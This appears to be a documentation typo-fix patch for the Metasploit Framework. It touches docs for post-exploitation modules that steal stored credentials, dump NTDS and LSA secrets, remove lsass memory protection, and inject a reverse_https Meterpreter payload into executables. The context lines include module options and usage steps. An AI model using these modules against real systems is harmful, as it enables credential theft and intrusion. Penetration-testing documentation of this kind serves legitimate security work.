@@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/operamail.md b/documentation/modules/post/windows/gather/credentials/operamail.md index f0b95e35246b..8538b78e0ab8 100644 --- a/documentation/modules/post/windows/gather/credentials/operamail.md +++ b/documentation/modules/post/windows/gather/credentials/operamail.md 
@@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/postbox.md b/documentation/modules/post/windows/gather/credentials/postbox.md index 22dd0b3ce45d..ce6448d4a3e7 100644 --- a/documentation/modules/post/windows/gather/credentials/postbox.md +++ b/documentation/modules/post/windows/gather/credentials/postbox.md 
@@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/qq.md b/documentation/modules/post/windows/gather/credentials/qq.md index 7fb9495cea0a..22dc0d0f85f1 100644 --- a/documentation/modules/post/windows/gather/credentials/qq.md +++ b/documentation/modules/post/windows/gather/credentials/qq.md @@ -25,9 +25,9 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. 
diff --git a/documentation/modules/post/windows/gather/credentials/safari.md b/documentation/modules/post/windows/gather/credentials/safari.md index a007b8aa2a41..7d64f6fa4b56 100644 --- a/documentation/modules/post/windows/gather/credentials/safari.md +++ b/documentation/modules/post/windows/gather/credentials/safari.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/seamonkey.md b/documentation/modules/post/windows/gather/credentials/seamonkey.md index 0852b1c3ac21..eb63180a5c5b 100644 --- a/documentation/modules/post/windows/gather/credentials/seamonkey.md +++ b/documentation/modules/post/windows/gather/credentials/seamonkey.md 
@@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ``` diff --git a/documentation/modules/post/windows/gather/credentials/srware.md b/documentation/modules/post/windows/gather/credentials/srware.md index 0a1dc7325015..f78af96c61be 100644 --- a/documentation/modules/post/windows/gather/credentials/srware.md +++ b/documentation/modules/post/windows/gather/credentials/srware.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ``` 
diff --git a/documentation/modules/post/windows/gather/credentials/tango.md b/documentation/modules/post/windows/gather/credentials/tango.md index 4716148847cf..875aa1e645fd 100644 --- a/documentation/modules/post/windows/gather/credentials/tango.md +++ b/documentation/modules/post/windows/gather/credentials/tango.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ``` diff --git a/documentation/modules/post/windows/gather/credentials/thunderbird.md b/documentation/modules/post/windows/gather/credentials/thunderbird.md index 246edaf1bec9..f6a765f687f4 100644 --- a/documentation/modules/post/windows/gather/credentials/thunderbird.md +++ b/documentation/modules/post/windows/gather/credentials/thunderbird.md 
@@ -25,10 +25,10 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/tlen.md b/documentation/modules/post/windows/gather/credentials/tlen.md index d8fd4f7fe556..b702db32f5d2 100644 --- a/documentation/modules/post/windows/gather/credentials/tlen.md +++ b/documentation/modules/post/windows/gather/credentials/tlen.md @@ -25,9 +25,9 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. \ No newline at end of file +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. \ No newline at end of file 
diff --git a/documentation/modules/post/windows/gather/credentials/viber.md b/documentation/modules/post/windows/gather/credentials/viber.md index 99c3bd379d62..17d4e49d8f38 100644 --- a/documentation/modules/post/windows/gather/credentials/viber.md +++ b/documentation/modules/post/windows/gather/credentials/viber.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/windowslivemail.md b/documentation/modules/post/windows/gather/credentials/windowslivemail.md index dddd0254fe64..4373c623676f 100644 --- a/documentation/modules/post/windows/gather/credentials/windowslivemail.md +++ b/documentation/modules/post/windows/gather/credentials/windowslivemail.md 
@@ -25,9 +25,9 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. \ No newline at end of file +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. \ No newline at end of file diff --git a/documentation/modules/post/windows/gather/credentials/xchat.md b/documentation/modules/post/windows/gather/credentials/xchat.md index 76dc481c874f..3fd8d0f6576e 100644 --- a/documentation/modules/post/windows/gather/credentials/xchat.md +++ b/documentation/modules/post/windows/gather/credentials/xchat.md 
@@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/forensics/fanny_bmp_check.md b/documentation/modules/post/windows/gather/forensics/fanny_bmp_check.md index b3e9d55d30ea..d49673a6f7a4 100644 --- a/documentation/modules/post/windows/gather/forensics/fanny_bmp_check.md +++ b/documentation/modules/post/windows/gather/forensics/fanny_bmp_check.md @@ -2,7 +2,7 @@ Fanny or DWE for short. (DWE = DementiaWheel) Detection module based on the `post/windows/gather/forensics/duqu_check` module. Fanny is a worm that infects windows -machines, via USB (not trough Autorun, or at least not only). +machines, via USB (not through Autorun, or at least not only). In fact, it used exploits later found in StuxNet. It creates creates some Registry artifacts. diff --git a/documentation/modules/post/windows/gather/lsa_secrets.md b/documentation/modules/post/windows/gather/lsa_secrets.md index ed1918982df1..2dcbfb16f9cd 100644 --- a/documentation/modules/post/windows/gather/lsa_secrets.md +++ b/documentation/modules/post/windows/gather/lsa_secrets.md 
@@ -17,7 +17,7 @@ This module will attempt to enumerate the LSA Secrets keys within the registry. ### STORE If the decrypted values should be stored in the database. This is a tradeoff since there is no way to tell if a decrypted -value is a legitamate password, thus you may fill your database with bad values. Default is `true`. +value is a legitimate password, thus you may fill your database with bad values. Default is `true`. ## Scenarios diff --git a/documentation/modules/post/windows/gather/make_csv_orgchart.md b/documentation/modules/post/windows/gather/make_csv_orgchart.md index 76b83136e8a2..7b46f77a4b8e 100644 --- a/documentation/modules/post/windows/gather/make_csv_orgchart.md +++ b/documentation/modules/post/windows/gather/make_csv_orgchart.md @@ -28,7 +28,7 @@ Option | Value -------------------| --- ACTIVE_USERS_ONLY | This will restrict the search for users to those whose accounts are Active. This would have the effect of excluding disabled accounts (e.g. employees who have resigned). FILTER | Any additional LDAP filtering that is required when searching for users. -WITH_MANAGERS_ONLY | If this is TRUE, the module will only include users who have a manger set (internally, this is implemented by adding (manager=*) to the ADSI query filter). This could be useful if not everyone has a manager set, but could mean that the top executive is not included either. +WITH_MANAGERS_ONLY | If this is TRUE, the module will only include users who have a manager set (internally, this is implemented by adding (manager=*) to the ADSI query filter). This could be useful if not everyone has a manager set, but could mean that the top executive is not included either. STORE_LOOT | Store the results in a CSV file in loot. You'll almost certainly want this set to TRUE. # Demo diff --git a/documentation/modules/post/windows/gather/ntds_grabber.md b/documentation/modules/post/windows/gather/ntds_grabber.md index a0ca4b9601c1..702591856edb 100644 
--- a/documentation/modules/post/windows/gather/ntds_grabber.md +++ b/documentation/modules/post/windows/gather/ntds_grabber.md @@ -1,6 +1,6 @@ ## Creating A Testing Environment To use this module you need an meterpreter on a domain controller. - The meterpreter has to have SYSTEM priviliges. + The meterpreter has to have SYSTEM privileges. Powershell has te be installed. This module has been tested against: @@ -15,7 +15,7 @@ This module was not tested against, but may work against: 1. Start msfconsole 2. Obtain a meterpreter session with a meterpreter via whatever method. - 3. Ensure the metepreter has SYSTEM priviliges. + 3. Ensure the metepreter has SYSTEM privileges. 4. Ensure powershell is installed. 3. Do: 'use post/windows/gather/ntds_grabber ' 4. Do: 'set session #' diff --git a/documentation/modules/post/windows/manage/dell_memory_protect.md b/documentation/modules/post/windows/manage/dell_memory_protect.md index 153995c08b46..bbffd407962a 100644 --- a/documentation/modules/post/windows/manage/dell_memory_protect.md +++ b/documentation/modules/post/windows/manage/dell_memory_protect.md @@ -52,11 +52,11 @@ in the scenarios below, the driver files are uploaded to `C:\Windows\Temp`, so t ### ENABLE_MEM_PROTECT -Enable or disable memory protection on the targetted process. `false` will remove memory protection and `true` will enable it. +Enable or disable memory protection on the targeted process. `false` will remove memory protection and `true` will enable it. ### PID -The ID of the targetted process. If set to 0 (the default value), the module will automatically find lsass.exe. +The ID of the targeted process. If set to 0 (the default value), the module will automatically find lsass.exe. ## Verification Steps 
@@ -158,7 +158,7 @@ Module options (post/windows/manage/dell_memory_protect): ---- --------------- -------- ----------- DRIVER_PATH yes The path containing the driver inf, cat, and sys (and coinstaller) ENABLE_MEM_PROTECT false yes Enable or disable memory protection - PID yes The targetted process + PID yes The targeted process SESSION yes The session to run this module on msf6 post(windows/manage/dell_memory_protect) > set SESSION 1 diff --git a/documentation/modules/post/windows/manage/execute_dotnet_assembly.md b/documentation/modules/post/windows/manage/execute_dotnet_assembly.md index 31e3c02a135f..ba8765e46c1f 100644 --- a/documentation/modules/post/windows/manage/execute_dotnet_assembly.md +++ b/documentation/modules/post/windows/manage/execute_dotnet_assembly.md @@ -22,7 +22,7 @@ You'll find details at [Execute assembly via Meterpreter session](https://b4rtik ### Example 1: Run within the same process 1. Build or download a .NET project - 1. Buid project with target framework that is present on the host + 1. Build project with target framework that is present on the host 1. Start msfconsole 1. Do: ```use post/windows/manage/execute_dotnet_assembly``` 1. Do: ```set SESSION sessionid``` @@ -79,7 +79,7 @@ msf5 post(windows/manage/execute_dotnet_assembly) > run ## Example 2: Run in existing process 1. Build or download a .NET project - 1. Buid project with target framework that is present on the host + 1. Build project with target framework that is present on the host 1. Start msfconsole 1. Do: ```use post/windows/manage/execute_dotnet_assembly``` 1. Do: ```set SESSION sessionid``` 
@@ -93,7 +93,7 @@ msf5 post(windows/manage/execute_dotnet_assembly) > run ## Example 3: Run in new process 1. Build or download a .NET project - 1. Buid project with target framework that is present on the host + 1. Build project with target framework that is present on the host 1. Start msfconsole 1. Do: ```use post/windows/manage/execute_dotnet_assembly``` 1. Do: ```set SESSION sessionid``` diff --git a/documentation/modules/post/windows/manage/hashcarve.md b/documentation/modules/post/windows/manage/hashcarve.md index 593c660f3bc9..f369bf1ce2ba 100644 --- a/documentation/modules/post/windows/manage/hashcarve.md +++ b/documentation/modules/post/windows/manage/hashcarve.md @@ -20,7 +20,7 @@ Here is the process that the module follows: - write they user key back into the registry ## Recommandations -I would recommand to use hashdump before using the module to backup the user hashes +I would recommend to use hashdump before using the module to backup the user hashes Use at your own risk. ## Limitations diff --git a/documentation/modules/post/windows/manage/peinjector.md b/documentation/modules/post/windows/manage/peinjector.md index 2ff83e5759ab..7bd7e3ec5e6a 100644 --- a/documentation/modules/post/windows/manage/peinjector.md +++ b/documentation/modules/post/windows/manage/peinjector.md @@ -7,7 +7,7 @@ as a thread within the process with the same privs. LHOST IP of host that will receive the connection from the payload. LPORT Port for Payload to connect to. OPTIONS Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format. -PAYLOAD Windows Payload to inject into the targer executable. +PAYLOAD Windows Payload to inject into the target executable. SESSION The session to run this module on. TARGETPE Path of the target executable to Path of the target executable to be injected 
@@ -59,7 +59,7 @@ Module options (post/windows/manage/peinjector):
 LHOST yes IP of host that will receive the connection from the payload.
 LPORT 4433 no Port for Payload to connect to.
 OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
- PAYLOAD windows/meterpreter/reverse_https no Windows Payload to inject into the targer executable.
+ PAYLOAD windows/meterpreter/reverse_https no Windows Payload to inject into the target executable.
 SESSION yes The session to run this module on.
 TARGETPE no Path of the target executable to be injected
@@ -82,7 +82,7 @@ Module options (post/windows/manage/peinjector):
 LHOST 192.168.135.111 yes IP of host that will receive the connection from the payload.
 LPORT 4561 no Port for Payload to connect to.
 OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
- PAYLOAD windows/x64/meterpreter/reverse_https no Windows Payload to inject into the targer executable.
+ PAYLOAD windows/x64/meterpreter/reverse_https no Windows Payload to inject into the target executable.
 SESSION 1 yes The session to run this module on.
 TARGETPE C:\users\msfuser\downloads\puttyx64.exe no Path of the target executable to be injected
diff --git a/documentation/modules/post/windows/manage/priv_migrate.md b/documentation/modules/post/windows/manage/priv_migrate.md
index 36d8a15b4dd5..b83087901441 100644
--- a/documentation/modules/post/windows/manage/priv_migrate.md
+++ b/documentation/modules/post/windows/manage/priv_migrate.md
@@ -14,7 +14,7 @@ This module is a nice addition to the beginning of an autorun script for post-Me
 - **ANAME** - This option allows you to specify a system level process that the module attempts to migrate to first if the session has admin rights.
 - **NAME** - This option allows you to specify the user level process that the module attempts to migrate to first if the session has user rights or if admin migration fails through all of the default processes.
 - **KILL** - This option allows you to kill the original process after a successful migration. The default value is FALSE.
-- **NOFAIL** - This option allows you to specify whether or not the module will migrate the session into a user level process if admin level migration fails. If TRUE, this may downgrade priviliged shells. The default value is FALSE.
+- **NOFAIL** - This option allows you to specify whether or not the module will migrate the session into a user level process if admin level migration fails. If TRUE, this may downgrade privileged shells. The default value is FALSE.
 ## Module Process
 Here is the process that the module follows:
From 7ffc1ca491f43d5bfd2da8053bd0759f5bf0971c Mon Sep 17 00:00:00 2001
From: h00die
Date: Wed, 11 Oct 2023 06:30:11 -0400
Subject: [PATCH 2/2] undo some spelling fixes when upstream has those issues
---
 documentation/modules/exploit/linux/samba/is_known_pipename.md | 2 +-
 documentation/modules/exploit/multi/http/magento_unserialize.md | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/documentation/modules/exploit/linux/samba/is_known_pipename.md b/documentation/modules/exploit/linux/samba/is_known_pipename.md
index 4ef19bfe5258..0757631b876e 100644
--- a/documentation/modules/exploit/linux/samba/is_known_pipename.md
+++ b/documentation/modules/exploit/linux/samba/is_known_pipename.md
@@ -18,7 +18,7 @@ where no SMB options are required to be set:
 comment = CVE-2017-7494
 path = /tmp
 writable = yes
-browsable = yes
+browseable = yes
 guest ok = yes
 ```
diff --git a/documentation/modules/exploit/multi/http/magento_unserialize.md b/documentation/modules/exploit/multi/http/magento_unserialize.md
index 572e263f1a52..43ad2331c2f9 100644
--- a/documentation/modules/exploit/multi/http/magento_unserialize.md
+++ b/documentation/modules/exploit/multi/http/magento_unserialize.md
@@ -68,7 +68,7 @@ If at some point the IP (base URL) of Magento has changed, then you will need to
 1. From the terminal, do: ```mysql -h localhost -u [username] -p[password]```
 2. In the SQL prompt, do: ```use [magento database name]```
-3. Do: ```select * from core_config_data;```, you should see both web/insecure/base_url (config ID 2) and web/secure/base_url (config ID 3) with the hardcoded IP.
+3. Do: ```select * from core_config_data;```, you should see both web/unsecure/base_url (config ID 2) and web/secure/base_url (config ID 3) with the hardcoded IP.
 4. Do: ```update core_config_data set value='http://[IP]/' where config_id=2;```
 5. Do: ```update core_config_data set value='https://[IP]/' where config_id=3;```
 6. Back to the Magento directory, do: ```sudo rm -rf var/cache/*```